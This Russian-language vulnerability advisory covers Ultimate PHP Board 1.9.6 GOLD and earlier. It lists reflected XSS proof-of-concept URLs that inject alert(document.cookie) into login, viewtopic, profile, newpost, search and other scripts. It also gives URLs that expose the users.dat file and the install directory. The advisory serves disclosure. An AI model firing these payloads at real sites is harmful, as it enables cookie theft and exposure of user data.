Программа: Ultimate PHP Board 1.9.6 GOLD и более ранние версии 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/upb/login.php?ref=%27%3E%3Cscrip t%3Ealert(document.cookie)%3C/script%3E 

http://[target]/upb/viewtopic.php?id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=1&t_id=1&page=
%27%3E%3Cscript%3Ealert( document.cookie)%3C/script%3E

http://[target]/upb/profile.php?action=get&id=%27 %3E%3Cscript%3Ealert(document.cookie)
%3C/script%3E

http://[target]/upb/newpost.php?id= 1&t=1&t_id= %27%3E%3Cscript%3Ealert(document.cookie)
%3C/script%3E

http://[target]/upb/newpost.php?id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[ta rget]/upb/email.php?id=%27%3E%3C script%3Ealert(document.cookies)%3C/script%3E

http://[target]/upb/icq.php?action=get&id=%27%3E%3C script%3Ealert(document.cookie)%3C/scr ipt%3E

http://[target]/upb/aol.php?action=get&id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/getpass.php?ref=%27%3E%3Cscript %3Ealert(d ocument.cookie)%3C/script%3E

http://[target]/upb/search.php?step=3&sText=
%27%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E 

Удаленный пользователь может также получить потенциально важную информацию о пользователях и узнать установочную директорию приложения. 

Примеры:

http://[target]/upb/db/users.dat 

http://[target]/upb/viewtopic.php?id=0

http://[target]/upb/profile.php?action=get&id=0

http://[target]/upb/newpost.php?t_id=0



Оставить мнение